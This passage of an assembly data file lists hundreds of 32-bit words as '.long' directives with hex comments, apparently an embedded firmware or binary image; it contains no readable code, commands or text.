0x628cb720 .long 1511113216 ## 0x5a11c200 .long 1493488166 ## 0x5904d226 .long 2158223888 ## 0x80a3e210 .long 2158748192 ## 0x80abe220 .long 218237698 ## 0xd020b02 .long 1076606368 ## 0x402bb5a0 .long 1078703520 ## 0x404bb5a0 .long 2432745473 ## 0x9100c001 .long 3490804738 ## 0xd0117402 .long 3491840768 ## 0xd0214300 .long 3221308672 ## 0xc0014500 .long 3221786658 ## 0xc0089022 .long 4287892930 ## 0xff940dc2 .long 42047669 ## 0x28198b5 .long 1485095552 ## 0x5884c280 .long 3121782410 ## 0xba129e8a .long 3508682755 ## 0xd1224003 .long 2656132735 ## 0x9e515e7f .long 1517928960 ## 0x5a79c200 .long 3525575192 ## 0xd2240218 .long 3263191307 ## 0xc280590b .long 3271580483 ## 0xc3005b43 .long 3123796100 ## 0xba315884 .long 3271573506 ## 0xc3004002 .long 3254803071 ## 0xc2005a7f .long 40393337 ## 0x2685a79 .long 1527497216 ## 0x5b0bc200 .long 1107998592 ## 0x420ab780 .long 2101272572 ## 0x7d3edffc .long 1116387104 ## 0x428ab720 .long 2437201920 ## 0x9144c000 .long 2088689660 ## 0x7c7edffc .long 1090572305 ## 0x4100d011 .long 1115738129 ## 0x4280d011 .long 2445459460 ## 0x91c2c004 .long 2101272572 ## 0x7d3edffc .long 2464464896 ## 0x92e4c000 .long 1074444833 ## 0x400aba21 .long 2455945216 ## 0x9262c000 .long 1644476224 ## 0x6204b740 .long 1652864864 ## 0x6284b760 .long 3525712388 ## 0xd2261a04 .long 2656393476 ## 0x9e555904 .long 3358629421 ## 0xc8309e2d .long 2654839118 ## 0x9e3da14e .long 3358589197 ## 0xc830010d .long 3221463885 ## 0xc003a34d .long 3121189536 ## 0xba0992a0 .long 3221307402 ## 0xc001400a .long 3072365348 ## 0xb7209324 .long 3074448780 ## 0xb7405d8c .long 3078644228 ## 0xb7806204 .long 2653765675 ## 0x9e2d402b .long 1511113216 ## 0x5a11c200 .long 3525712388 ## 0xd2261a04 .long 3080739076 ## 0xb7a05904 .long 3358614156 ## 0xc830628c .long 3078660430 ## 0xb780a14e .long 2640134187 ## 0x9d5d402b .long 2848380961 ## 0xa9c6d821 .long 1511113216 ## 0x5a11c200 .long 3525712388 ## 0xd2261a04 .long 3623901444 ## 0xd8005904 .long 218278337 ## 0xd02a9c1 .long 1073986075 ## 0x4003ba1b .long 2739783728 ## 0xa34dc830 .long 1073920539 ## 0x4002ba1b .long 2597519348 ## 0x9ad2fff4 .long 1116387200 ## 0x428ab780 .long 1073920548 ## 0x4002ba24 .long 1493488166 ## 0x5904d226 .long 2638678532 ## 0x9d470a04 .long 1493488166 ## 0x5904d226 .long 3360726355 ## 0xc8509d53 .long 3394283942 ## 0xca50a9a6 .long 218278277 ## 0xd02a985 .long 2449522689 ## 0x9200c001 .long 1644476224 ## 0x6204b740 .long 437440529 ## 0x1a12d011 .long 1501876776 ## 0x5984d228 .long 1493487782 ## 0x5904d0a6 .long 3080756781 ## 0xb7a09e2d .long 3490800268 ## 0xd011628c .long 3357542930 ## 0xc8200a12 .long 3358630242 ## 0xc830a162 .long 3525749198 ## 0xd226a9ce .long 2648267012 ## 0x9dd95904 .long 2848835632 ## 0xa9cdc830 .long 2741094432 ## 0xa361c820 .long 1073986075 ## 0x4003ba1b .long 1073920539 ## 0x4002ba1b .long 2594373620 ## 0x9aa2fff4 .long 1116387200 ## 0x428ab780 .long 1073920548 ## 0x4002ba24 .long 1493488166 ## 0x5904d226 .long 2638678532 ## 0x9d470a04 .long 1493488166 ## 0x5904d226 .long 2639503026 ## 0x9d539eb2 .long 2846279760 ## 0xa9a6c850 .long 2844117584 ## 0xa985ca50 .long 1073920552 ## 0x4002ba28 .long 1073986075 ## 0x4003ba1b .long 1073920539 ## 0x4002ba1b .long 2592800756 ## 0x9a8afff4 .long 1073920528 ## 0x4002ba10 .long 1577374370 ## 0x5e04d2a2 .long 306842994 ## 0x124a0d72 .long 1073920516 ## 0x4002ba04 .long 3289685588 ## 0xc4149e54 .long 3121180672 ## 0xba097000 .long 3289399298 ## 0xc4104002 .long 1946185800 ## 0x74007048 .long 3221225475 ## 0xc0000003 .long 268669046 ## 0x10039076 .long 1073920512 ## 0x4002ba00 .long 1577374498 ## 0x5e04d322 .long 13684768 ## 0xd0d020 .long 3120828996 ## 0xba041244 .long 2656321538 ## 0x9e544002 .long 1879098388 ## 0x7000c414 .long 1073920521 ## 0x4002ba09 .long 1883816976 ## 0x7048c410 .long 1585303714 ## 0x5e7dd0a2 .long 1946197449 ## 0x74009dc9 .long 3221291011 ## 0xc0010003 .long 1552352404 ## 0x5c870494 .long 1073986089 ## 0x4003ba29 .long 2423701504 ## 0x9076c000 .long 3120566275 ## 0xba001003 .long 35667970 ## 0x2204002 .long 1493025280 ## 0x58fdc200 .long 3254780482 ## 0xc2000242 .long 3355335175 ## 0xc7fe5a07 .long 3355324156 ## 0xc7fe2efc .long 155069052 ## 0x93e2a7c .long 211730484 ## 0xc9ec034 .long 3221271617 ## 0xc000b441 .long 1552470690 ## 0x5c88d2a2 .long 1514717696 ## 0x5a48c200 .long 210944130 ## 0xc92c082 .long 687656958 ## 0x28fccffe .long 3030463170 ## 0xb4a132c2 .long 3229794304 ## 0xc082c000 .long 3030519062 ## 0xb4a20d16 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 210288640 ## 0xc88c000 .long 3221271713 ## 0xc000b4a1 .long 3030519048 ## 0xb4a20d08 .long 3078668288 ## 0xb780c000 .long 3757851018 ## 0xdffc418a .long 3221257534 ## 0xc0007d3e .long 172659076 ## 0xa4a9184 .long 211730484 ## 0xc9ec034 .long 3221271681 ## 0xc000b481 .long 224051330 ## 0xd5ac082 .long 3022167673 ## 0xb4229e79 .long 3224682496 ## 0xc034c000 .long 3034647710 ## 0xb4e10c9e .long 3080699904 ## 0xb79fc000 .long 3082780270 ## 0xb7bf7e6e .long 3084877550 ## 0xb7df7eee .long 3086974830 ## 0xb7ff7f6e .long 3221389294 ## 0xc0027fee .long 2619509760 ## 0x9c228c00 .long 2097070108 ## 0x7cfec01c .long 3221266008 ## 0xc0009e58 .long 3490812900 ## 0xd01193e4 .long 1963334146 ## 0x75061a02 .long 2482290688 ## 0x93f4c000 .long 436916241 ## 0x1a0ad011 .long 3221255430 ## 0xc0007506 .long 3492188370 ## 0xd02690d2 .long 3221313796 ## 0xc0015904 .long 3492909344 ## 0xd0319120 .long 1964907010 ## 0x751e1a02 .long 2429730816 ## 0x90d2c000 .long 151048243 ## 0x900d033 .long 2415968257 ## 0x9000c001 .long 1510260736 ## 0x5a04c000 .long 423678035 ## 0x1940d053 .long 2470494208 ## 0x9340c000 .long 436391953 ## 0x1a02d011 .long 3221255430 ## 0xc0007506 .long 2233634994 ## 0x852290b2 .long 2453716992 ## 0x9240c000 .long 436916241 ## 0x1a0ad011 .long 3221255462 ## 0xc0007526 .long 3492909426 ## 0xd0319172 .long 3254782474 ## 0xc2000a0a .long 37902589 ## 0x24258fd .long 1493684774 ## 0x5907d226 .long 2424356864 ## 0x9080c000 .long 420270099 ## 0x190cd013 .long 2619514179 ## 0x9c229d43 .long 1435285376 ## 0x558cb780 .long 2827153928 ## 0xa882f208 .long 338874384 ## 0x1432d010 .long 3221255229 ## 0xc000743d .long 142315702 ## 0x87b90b6 .long 2430648320 ## 0x90e0c000 .long 2232054790 ## 0x850a7406 .long 1148760834 ## 0x4478b302 .long 4060650819 ## 0xf2089d43 .long 3792742659 ## 0xe210a903 .long 168460321 ## 0xa0a8021 .long 3222407422 ## 0xc01208fe .long 3222302728 ## 0xc0107008 .long 2619502594 ## 0x9c227002 .long 1419032352 ## 0x5494b720 .long 3072361730 ## 0xb7208502 .long 3624944075 ## 0xd81041cb .long 3624968575 ## 0xd810a17f .long 2231542131 ## 0x8502a173 .long 1435285376 ## 0x558cb780 .long 2707943440 ## 0xa167f010 .long 2709248016 ## 0xa17bd810 .long 2708985872 ## 0xa177d810 .long 2707937360 ## 0xa167d850 .long 2709254160 ## 0xa17bf010 .long 2708461648 ## 0xa16fd850 .long 2708199504 ## 0xa16bd850 .long 2707675216 ## 0xa163d850 .long 2707943504 ## 0xa167f050 .long 2707681360 ## 0xa163f050 .long 2709516304 ## 0xa17ff010 .long 2708467792 ## 0xa16ff050 .long 2708205648 ## 0xa16bf050 .long 2699161616 ## 0xa0e1f010 .long 2703219208 ## 0xa11fda08 .long 2702432776 ## 0xa113da08 .long 2701652488 ## 0xa107f208 .long 2702957064 ## 0xa11bda08 .long 2702694920 ## 0xa117da08 .long 2701646408 ## 0xa107da48 .long 2702963208 ## 0xa11bf208 .long 2702170696 ## 0xa10fda48 .long 2701908552 ## 0xa10bda48 .long 2701384264 ## 0xa103da48 .long 2701652552 ## 0xa107f248 .long 1103869728 ## 0x41cbb720 .long 2701390408 ## 0xa103f248 .long 2703225352 ## 0xa11ff208 .long 2702176840 ## 0xa10ff248 .long 2692870664 ## 0xa081f208 .long 2701914696 ## 0xa10bf248 .long 3078659106 ## 0xb7809c22 .long 4027602316 ## 0xf010558c .long 4060653793 ## 0xf208a8e1 .long 3624968321 ## 0xd810a081 .long 3658000626 ## 0xda08a8f2 .long 3629162642 ## 0xd850a092 .long 3662194917 ## 0xda48a8e5 .long 4031815813 ## 0xf050a085 .long 4064848102 ## 0xf248a8e6 .long 4031815814 ## 0xf050a086 .long 4064848097 ## 0xf248a8e1 .long 3624968321 ## 0xd810a081 .long 3658000638 ## 0xda08a8fe .long 4027621534 ## 0xf010a09e .long 4060653817 ## 0xf208a8f9 .long 4027621529 ## 0xf010a099 .long 4060653798 ## 0xf208a8e6 .long 3629162630 ## 0xd850a086 .long 3662194913 ## 0xda48a8e1 .long 3624968321 ## 0xd810a081 .long 3658000634 ## 0xda08a8fa .long 3629162650 ## 0xd850a09a .long 3662194925 ## 0xda48a8ed .long 3624968333 ## 0xd810a08d .long 3658000630 ## 0xda08a8f6 .long 3629162646 ## 0xd850a096 .long 3662194921 ## 0xda48a8e9 .long 4031815817 ## 0xf050a089 .long 4064848110 ## 0xf248a8ee .long 4027621518 ## 0xf010a08e .long 3072370941 ## 0xb720a8fd .long 4060632724 ## 0xf2085694 .long 3074465949 ## 0xb740a09d .long 4031791581 ## 0xf05041dd .long 3271666281 ## 0xc301aa69 .long 3040903456 ## 0xb5408120 .long 4031791581 ## 0xf05041dd .long 4077955681 ## 0xf310aa61 .long 2231535649 ## 0x85028821 .long 1087223168 ## 0x40cdb580 .long 2708723728 ## 0xa173d810 .long 134382850 ## 0x8028502 .long 2707943440 ## 0xa167f010 .long 2709248016 ## 0xa17bd810 .long 2708985872 ## 0xa177d810 .long 2707937360 ## 0xa167d850 .long 2709254160 ## 0xa17bf010 .long 2708461648 ## 0xa16fd850 .long 2708199504 ## 0xa16bd850 .long 2708205648 ## 0xa16bf050 .long 1958911010 ## 0x74c29c22 .long 3221331548 ## 0xc0019e5c .long 3078656452 ## 0xb78091c4 .long 3523762444 ## 0xd208590c .long 1950394501 ## 0x7440a885 .long 3041035522 ## 0xb5428502 .long 3221311512 ## 0xc0015018 .long 3078656420 ## 0xb78091a4 .long 3072349580 ## 0xb720558c .long 3662173076 ## 0xda485394 .long 3074467969 ## 0xb740a881 .long 3078636237 ## 0xb78042cd .long 3074446476 ## 0xb740548c .long 1620399764 ## 0x60955694 .long 2836918856 ## 0xa917f248 .long 2840457232 ## 0xa94df010 .long 1153808192 ## 0x44c5b740 .long 1145943936 ## 0x444db780 .long 2166669825 ## 0x8124c201 .long 2292441616 ## 0x88a3e210 .long 2317480720 ## 0x8a21f310 .long 3221254216 ## 0xc0007048 .long 3043135996 ## 0xb56291fc .long 3221245960 ## 0xc0005008 .long 1958777184 ## 0x74c09160 .long 2433007616 ## 0x9104c000 .long 1418508064 ## 0x548cb720 .long 2852248072 ## 0xaa01da08 .long 1101772160 ## 0x41abb580 .long 1342748418 ## 0x5008b702 .long 2786958370 ## 0xa61d9c22 .long 3124432514 ## 0xba3b0e82 .long 3423748098 ## 0xcc124002 .long 2662888138 ## 0x9eb872ca .long 2660671062 ## 0x9e969e56 .long 313288369 ## 0x12ac66b1 .long 3120657728 ## 0xba017540 .long 3221241859 ## 0xc0004003 .long 93033276 ## 0x58b933c .long 218235275 ## 0xd02018b .long 2614804532 ## 0x9bdac034 .long 1577833250 ## 0x5e0bd322 .long 2659545416 ## 0x9e857148 .long 2468003840 ## 0x931ac000 .long 1502663460 ## 0x5990d324 .long 218235374 ## 0xd0201ee .long 2614018100 ## 0x9bcec034 .long 1614913132 ## 0x60419e6c .long 1519636516 ## 0x5a93d024 .long 2441134080 ## 0x9180c000 .long 1401730944 ## 0x538cb780 .long 2827672072 ## 0xa88ada08 .long 361811984 ## 0x1590d010 .long 3224636674 ## 0xc0340d02 .long 2659556287 ## 0x9e859bbf .long 3080691304 ## 0xb79f9e68 .long 3082780270 ## 0xb7bf7e6e .long 3084877550 ## 0xb7df7eee .long 3086974830 ## 0xb7ff7f6e .long 3221389294 ## 0xc0027fee .long 2619509760 ## 0x9c228c00 .long 2218829341 ## 0x8440a61d .long 1402255328 ## 0x5394b7e0 .long 2859850256 ## 0xaa75da10 .long 1418508256 ## 0x548cb7e0 .long 3074454842 ## 0xb740753a .long 4060632460 ## 0xf208558c .long 209889889 ## 0xc82aa61 .long 210948106 ## 0xc92d00a .long 2121577791 ## 0x7e74b53f .long 3624432900 ## 0xd8087504 .long 3628640861 ## 0xd848aa5d .long 3047139521 ## 0xb59fa8c1 .long 4027088620 ## 0xf0087eec .long 2660083934 ## 0x9e8da8de .long 3123514114 ## 0xba2d0b02 .long 3040821251 ## 0xb53f4003 .long 3221323636 ## 0xc0017f74 .long 3082850980 ## 0xb7c092a4 .long 4061157012 ## 0xf2105694 .long 4061178187 ## 0xf210a94b .long 2000726605 ## 0x7740aa4d .long 2292314896 ## 0x88a1f310 .long 2451357696 ## 0x921cc000 .long 2848387144 ## 0xa9c6f048 .long 218275435 ## 0xd029e6b .long 2608775220 ## 0x9b7ec034 .long 2842417680 ## 0xa96bda10 .long 2284581648 ## 0x882bf310 .long 315645961 ## 0x12d06009 .long 1900860434 ## 0x714cd412 .long 2859069960 ## 0xaa69f208 .long 3080680706 ## 0xb79f7502 .long 142769772 ## 0x8827e6c .long 143839241 ## 0x892d009 .long 3221321800 ## 0xc0017848 .long 3078591394 ## 0xb77f93a2 .long 3074391402 ## 0xb73f7d6a .long 2662039412 ## 0x9eab7f74 .long 2840195664 ## 0xa949f250 .long 1073920539 ## 0x4002ba1b .long 76219651 ## 0x48b0503 .long 2607939572 ## 0x9b71fff4 .long 2462105601 ## 0x92c0c001 .long 1452586784 ## 0x5694b720 .long 1079883584 ## 0x405db740 .long 1104000896 ## 0x41cdb780 .long 4077942592 ## 0xf3107740 .long 3221260449 ## 0xc00088a1 .long 3658518876 ## 0xda10915c .long 3078662507 ## 0xb780a96b .long 3809494605 ## 0xe310464d .long 1648593067 ## 0x624388ab .long 4060615384 ## 0xf20812d8 .long 1963108969 ## 0x7502aa69 .long 2431827968 ## 0x90f2c000 .long 2859063816 ## 0xaa69da08 .long 3221255424 ## 0xc0007500 .long 3074462242 ## 0xb7409222 .long 3078571469 ## 0xb77f45cd .long 3074391402 ## 0xb73f7d6a .long 2662039412 ## 0x9eab7f74 .long 1073920539 ## 0x4002ba1b .long 76219651 ## 0x48b0503 .long 2605055988 ## 0x9b45fff4 .long 2436939776 ## 0x9140c000 .long 2842417680 ## 0xa96bda10 .long 3809517227 ## 0xe3109eab .long 218270123 ## 0xd0289ab .long 2603139124 ## 0x9b28c034 .long 134349569 ## 0x8020301 .long 1904263186 ## 0x7180c012 .long 2104407967 ## 0x7d6eb79f .long 2112796607 ## 0x7deeb7bf .long 2121185247 ## 0x7e6eb7df .long 2129573887 ## 0x7eeeb7ff .long 2353053698 ## 0x8c40c002 .long 2785385506 ## 0xa6059c22 .long 1661253440 ## 0x6304b740 .long 1073986066 ## 0x4003ba12 .long 505597969 ## 0x1e22d011 .long 1493488166 ## 0x5904d226 .long 3358629421 ## 0xc8309e2d .long 3121850573 ## 0xba13a8cd .long 2656780290 ## 0x9e5b4002 .long 1779879953 ## 0x6a16d011 .long 2655875208 ## 0x9e4d7088 .long 2432483329 ## 0x90fcc001 .long 3221255360 ## 0xc00074c0 .long 3246428700 ## 0xc180921c .long 3491781127 ## 0xd0205a07 .long 218235304 ## 0xd0201a8 .long 2600124468 ## 0x9afac034 .long 2854613512 ## 0xaa25f208 .long 3525599809 ## 0xd2246241 .long 3221248323 ## 0xc0005943 .long 3490812128 ## 0xd01190e0 .long 2661420578 ## 0x9ea20e22 .long 1073986066 ## 0x4003ba12 .long 1452062496 ## 0x568cb720 .long 168874129 ## 0xa10d091 .long 2827145736 ## 0xa882d208 .long 3004330626 ## 0xb3127282 .long 3221243994 ## 0xc000485a .long 3072364762 ## 0xb72090da .long 3356643249 ## 0xc8124fb1 .long 2656072322 ## 0x9e507282 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 3072370181 ## 0xb720a605 .long 3072349332 ## 0xb7205494 .long 3070246989 ## 0xb700404d .long 1950635924 ## 0x74445794 .long 503369809 ## 0x1e00d051 .long 1145221952 ## 0x4442b340 .long 3072368205 ## 0xb7209e4d .long 2656846794 ## 0x9e5c43ca .long 1073986066 ## 0x4003ba12 .long 2088689660 ## 0x7c7edffc .long 1073920539 ## 0x4002ba1b .long 1073920530 ## 0x4002ba12 .long 2432876544 ## 0x9102c000 .long 4294182017 ## 0xfff40481 .long 2659359652 ## 0x9e829ba4 .long 1073986066 ## 0x4003ba12 .long 2854605448 ## 0xaa25d288 .long 3221255426 ## 0xc0007502 .long 3078656452 ## 0xb78091c4 .long 3523761164 ## 0xd208540c .long 1950394497 ## 0x7440a881 .long 2430910464 ## 0x90e4c000 .long 237293585 ## 0xe24d011 .long 3121782434 ## 0xba129ea2 .long 3532144643 ## 0xd2884003 .long 1963108905 ## 0x7502aa29 .long 2430910464 ## 0x90e4c000 .long 237162513 ## 0xe22d011 .long 3121782434 ## 0xba129ea2 .long 3662168067 ## 0xda484003 .long 2656217657 ## 0x9e52aa39 .long 147378193 ## 0x8c8d011 .long 3221254274 ## 0xc0007082 .long 2659881212 ## 0x9e8a90fc .long 1073986066 ## 0x4003ba12 .long 2436939776 ## 0x9140c000 .long 437296721 ## 0x1a109e51 .long 3122950216 ## 0xba247048 .long 3005497346 ## 0xb3244002 .long 2661435446 ## 0x9ea24836 .long 1452062496 ## 0x568cb720 .long 1328134016 ## 0x4f29b780 .long 304651858 ## 0x12289e52 .long 3121782434 ## 0xba129ea2 .long 1988378627 ## 0x76844003 .long 3221266057 ## 0xc0009e89 .long 218796220 ## 0xd0a90bc .long 2430648320 ## 0x90e0c000 .long 2239461051 ## 0x857b76bb .long 1216000802 ## 0x487ab322 .long 3074465227 ## 0xb7409dcb .long 3792719705 ## 0xe2104f59 .long 3499196589 ## 0xd09180ad .long 2659847696 ## 0x9e8a0e10 .long 2852246024 ## 0xaa01d208 .long 1073986066 ## 0x4003ba12 .long 1883807313 ## 0x70489e51 .long 1146794818 ## 0x445ab342 .long 2432352256 ## 0x90fac000 .long 1338619776 ## 0x4fc9b780 .long 3356663457 ## 0xc8129ea1 .long 2656072322 ## 0x9e507282 .long 2137962399 ## 0x7f6eb79f .long 2146351039 ## 0x7feeb7bf .long 2619509824 ## 0x9c228c40 .long 3757876765 ## 0xdffca61d .long 3221257982 ## 0xc0007efe .long 3078656516 ## 0xb7809204 .long 3082835340 ## 0xb7c0558c .long 3657979796 ## 0xda085794 .long 3658001049 ## 0xda08aa99 .long 4060654353 ## 0xf208ab11 .long 3658001030 ## 0xda08aa86 .long 3221269397 ## 0xc000ab95 .long 3078656448 ## 0xb78091c0 .long 3082835340 ## 0xb7c0558c .long 3662173972 ## 0xda485714 .long 3662195341 ## 0xda48aa8d .long 4060654341 ## 0xf208ab05 .long 3662195354 ## 0xda48aa9a .long 3221793673 ## 0xc008ab89 .long 3221255488 ## 0xc0007540 .long 2662044124 ## 0x9eab91dc .long 2589638708 ## 0x9a5ac034 .long 3254820481 ## 0xc2009e81 .long 3254801059 ## 0xc20052a3 .long 3254801219 ## 0xc2005343 .long 3254801379 ## 0xc20053e3 .long 3074447015 ## 0xb74056a7 .long 3534119172 ## 0xd2a66104 .long 2653772036 ## 0x9e2d5904 .long 2832058416 ## 0xa8cdc830 .long 2857490960 ## 0xaa51da10 .long 1676895075 ## 0x63f36363 .long 1637660480 ## 0x619cb740 .long 3658484228 ## 0xda100a04 .long 2659820113 ## 0x9e89a251 .long 3658521927 ## 0xda109d47 .long 3255872085 ## 0xc210aa55 .long 1725147429 ## 0x66d3a925 .long 4077946222 ## 0xf310856e .long 2660337697 ## 0x9e918821 .long 1073920556 ## 0x4002ba2c .long 1453834752 ## 0x56a7c200 .long 2001256460 ## 0x7748c00c .long 1397473792 ## 0x534bc200 .long 1407959552 ## 0x53ebc200 .long 2457649153 ## 0x927cc001 .long 1971372288 ## 0x7580c100 .long 3229523563 ## 0xc07e9e6b .long 3009677950 ## 0xb3640a7e .long 3525723192 ## 0xd2264438 .long 3263189268 ## 0xc2805114 .long 3793771911 ## 0xe2205d87 .long 218268079 ## 0xd0281af .long 2582691892 ## 0x99f0c034 .long 2839802384 ## 0xa943f210 .long 1636749362 ## 0x618ed032 .long 2849102352 ## 0xa9d1da10 .long 2175787552 ## 0x81afe220 .long 3122334978 ## 0xba1b0d02 .long 4061151234 ## 0xf2104002 .long 3224674754 ## 0xc034a1c2 .long 1969134049 ## 0x755e99e1 .long 2688938512 ## 0xa045f210 .long 441503821 ## 0x1a50d04d .long 1377030170 ## 0x5213d01a .long 2430255104 ## 0x90dac000 .long 4077946178 ## 0xf3108542 .long 1376815139 ## 0x52108823 .long 2722492944 ## 0xa245f210 .long 3658515718 ## 0xda108506 .long 3080692063 ## 0xb79fa15f .long 3082780270 ## 0xb7bf7e6e .long 3084877550 ## 0xb7df7eee .long 3086974830 ## 0xb7ff7f6e .long 3221389294 ## 0xc0027fee .long 2619509760 ## 0x9c228c00 .long 1992467981 ## 0x76c2a60d .long 1402255264 ## 0x5394b7a0 .long 2460270593 ## 0x92a4c001 .long 1435285408 ## 0x558cb7a0 .long 2855131720 ## 0xaa2dda48 .long 3221255424 ## 0xc0007500 .long 226922658 ## 0xd8690a2 .long 2606825460 ## 0x9b60fff4 .long 2855918088 ## 0xaa39da08 .long 3221255424 ## 0xc0007500 .long 226660514 ## 0xd8290a2 .long 2606301172 ## 0x9b58fff4 .long 2829179464 ## 0xa8a1da48 .long 2854869520 ## 0xaa29da10 .long 3221254216 ## 0xc0007048 .long 3657995138 ## 0xda089382 .long 4294224701 ## 0xfff4ab3d .long 3078658545 ## 0xb78099f1 .long 4060632204 ## 0xf208548c .long 3524307073 ## 0xd210a881 .long 3072371361 ## 0xb720aaa1 .long 1950504596 ## 0x74425694 .long 1330230688 ## 0x4f49b5a0 .long 2661981827 ## 0x9eaa9e83 .long 1073920542 ## 0x4002ba1e .long 4294183190 ## 0xfff40916 .long 3120601785 ## 0xba009ab9 .long 3524280322 ## 0xd2104002 .long 3524304929 ## 0xd210a021 .long 3080693793 ## 0xb79fa821 .long 3082780398 ## 0xb7bf7eee .long 3084877678 ## 0xb7df7f6e .long 2355134446 ## 0x8c607fee .long 2619513890 ## 0x9c229c22 .long 1073920539 ## 0x4002ba1b .long 1485296036 ## 0x5887d1a4 .long 2655559258 ## 0x9e489e5a .long 1377831046 ## 0x52200886 .long 1887967748 ## 0x70881a04 .long 2424094721 ## 0x907cc001 .long 134389324 ## 0x8029e4c .long 3490803720 ## 0xd0117008 .long 1353718322 ## 0x50b01a32 .long 2446770176 ## 0x91d6c000 .long 3221256260 ## 0xc0007844 .long 3490812324 ## 0xd01191a4 .long 3120826882 ## 0xba040a02 .long 2655797250 ## 0x9e4c4002 .long 1485271048 ## 0x58877008 .long 2463694847 ## 0x92d8ffff .long 2619475970 ## 0x9c220802 .long 3120566320 ## 0xba001030 .long 2619490306 ## 0x9c224002 .long 1493684646 ## 0x5907d1a6 .long 2283921936 ## 0x8821e210 .long 1073920512 ## 0x4002ba00 .long 3490815010 ## 0xd0119c22 .long 134356498 ## 0x8021e12 .long 1353740296 ## 0x50b07008 .long 2448867328 ## 0x91f6c000 .long 2017762977 ## 0x78449ea1 .long 2449801215 ## 0x9204ffff .long 167956497 ## 0xa02d011 .long 1073920516 ## 0x4002ba04 .long 1879613004 ## 0x70089e4c .long 4294924423 ## 0xffff5887 .long 134648536 ## 0x80692d8 .long 3078659106 ## 0xb7809c22 .long 4064826508 ## 0xf248548c .long 2660804887 ## 0x9e98a917 .long 3793753520 ## 0xe22015b0 .long 4064838063 ## 0xf24881af .long 3490750870 ## 0xd010a196 .long 1983948994 ## 0x7640a8c2 .long 3221555586 ## 0xc0050982 .long 2231800420 ## 0x85069264 .long 2706100240 ## 0xa14bd010 .long 2852254216 ## 0xaa01f208 .long 3490739458 ## 0xd0107502 .long 3221362096 ## 0xc00215b0 .long 3072365252 ## 0xb72092c4 .long 3074446220 ## 0xb740538c .long 3508945837 ## 0xd12643ad .long 4061157648 ## 0xf2105910 .long 3254814757 ## 0xc2008825 .long 1892178451 ## 0x70c85a13 .long 3070271115 ## 0xb7009e8b .long 3221509780 ## 0xc0045694 .long 4031812022 ## 0xf05091b6 .long 1892199013 ## 0x70c8aa65 .long 2440609792 ## 0x9178c000 .long 1321776928 ## 0x4ec8b720 .long 706663409 ## 0x2a1ed3f1 .long 3221452038 ## 0xc0037506 .long 3221459572 ## 0xc0039274 .long 3492909792 ## 0xd03192e0 .long 3254807081 ## 0xc2006a29 .long 1892178451 ## 0x70c85a13 .long 2440609792 ## 0x9178c000 .long 1321776928 ## 0x4ec8b720 .long 706663409 ## 0x2a1ed3f1 .long 3221452036 ## 0xc0037504 .long 3221459060 ## 0xc0039074 .long 3492909280 ## 0xd03190e0 .long 3254807079 ## 0xc2006a27 .long 1892178451 ## 0x70c85a13 .long 2440609792 ## 0x9178c000 .long 1321776928 ## 0x4ec8b720 .long 706663409 ## 0x2a1ed3f1 .long 3221386498 ## 0xc0027502 .long 3221394036 ## 0xc0029274 .long 3490812640 ## 0xd01192e0 .long 3254807085 ## 0xc2006a2d .long 1892178451 ## 0x70c85a13 .long 2463678466 ## 0x92d8c002 .long 213176497 ## 0xcb4d0b1 .long 1314436928 ## 0x4e58b740 .long 1076475776 ## 0x4029b780 .long 1321776928 ## 0x4ec8b720 .long 2149708560 ## 0x8021f310 .long 3221319752 ## 0xc0017048 .long 3221394360 ## 0xc00293b8 .long 3072364576 ## 0xb7209020 .long 3074446220 ## 0xb740538c .long 3508945837 ## 0xd12643ad .long 4061157648 ## 0xf2105910 .long 3254814757 ## 0xc2008825 .long 1892178451 ## 0x70c85a13 .long 3070271115 ## 0xb7009e8b .long 3221313172 ## 0xc0015694 .long 4031812406 ## 0xf0509336 .long 1892199013 ## 0x70c8aa65 .long 2446786558 ## 0x91d6fffe .long 1780994097 ## 0x6a27d031 .long 1511244288 ## 0x5a13c200 .long 3221254344 ## 0xc00070c8 .long 3078656440 ## 0xb78091b8 .long 3223080648 ## 0xc01c4ec8 .long 3221257534 ## 0xc0007d3e .long 168072164 ## 0xa0493e4 .long 1321776512 ## 0x4ec8b580 .long 2420162561 ## 0x9040c001 .long 1510457600 ## 0x5a07c100 .long 3221254344 ## 0xc00070c8 .long 3501298552 ## 0xd0b19378 .long 3074428084 ## 0xb7400cb4 .long 3078639192 ## 0xb7804e58 .long 3072344105 ## 0xb7204029 .long 4077932232 ## 0xf3104ec8 .long 1883799585 ## 0x70488021 .long 2434187264 ## 0x9116c000 .long 169005073 ## 0xa12d011 .long 1321776512 ## 0x4ec8b580 .long 2436939776 ## 0x9140c000 .long 2697646096 ## 0xa0cad010 .long 1322300704 ## 0x4ed0b520 .long 2424356864 ## 0x9080c000 .long 2697646096 ## 0xa0cad010 .long 2859849744 ## 0xaa75d810 .long 1112323872 ## 0x424cb720 .long 1883773444 ## 0x70481a04 .long 1218753344 ## 0x48a4b340 .long 3490743554 ## 0xd0108502 .long 2619515211 ## 0x9c22a14b .long 2714357776 ## 0xa1c9d010 .long 3222182946 ## 0xc00e9c22 .long 3543215612 ## 0xd3312dfc .long 3490802875 ## 0xd0116cbb .long 1486954038 ## 0x58a11e36 .long 3122950216 ## 0xba247048 .long 3004448770 ## 0xb3144002 .long 8995900 ## 0x89443c .long 1577374114 ## 0x5e04d1a2 .long 2265609282 ## 0x870a7442 .long 3004304780 ## 0xb3120d8c .long 2656650394 ## 0x9e59449a .long 1896009746 ## 0x7102d012 .long 1962983428 ## 0x7500c004 .long 1452586784 ## 0x5694b720 .long 3007481214 ## 0xb342857e .long 3040887928 ## 0xb5404478 .long 3221376961 ## 0xc0024fc1 .long 3040873600 ## 0xb5400c80 .long 2619490393 ## 0x9c224059 .long 3224413701 ## 0xc030a605 .long 3080760445 ## 0xb7a0ac7d .long 2639877004 ## 0x9d59538c .long 2757607480 ## 